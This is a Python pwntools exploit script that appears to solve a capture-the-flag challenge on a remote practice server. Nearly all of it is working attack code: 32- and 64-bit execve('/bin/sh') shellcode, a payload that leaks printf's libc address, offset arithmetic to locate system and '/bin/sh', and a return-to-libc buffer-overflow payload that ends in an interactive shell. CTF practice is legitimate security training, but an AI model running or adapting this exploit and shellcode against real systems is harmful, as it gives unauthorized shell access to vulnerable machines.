from pwn import *


r = remote("ctf.j0n9hyun.xyz", 3015)
libc = ELF("./libc.so.6")


shellcode32 = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
shellcode64 = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05"

'''
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
'''





payload  = b""
payload += p32(0xffffd060)
payload += p32(0x80487b0)
payload += p32(0xb8d55897) 
payload += p32(0)
payload += p32(0)

r.sendline(payload)

r.recvuntil("바로 ")

libc_printf = int(r.recvuntil(" ")[2:-1].decode(),16)
print(libc_printf)

libc_system = libc_printf + ( libc.symbols['system'] - libc.symbols['printf'])
libc_binsh  = libc_printf + ( next(libc.search(b'/bin/sh')) - libc.symbols['printf'])

pop_ret = 0x08048683

payload  = b""
payload += b"a" * 0x3e
payload += b"b" * 0x4
payload += p32(libc_system)
payload += p32(pop_ret)
payload += p32(libc_binsh)

r.sendline(payload)

r.interactive()







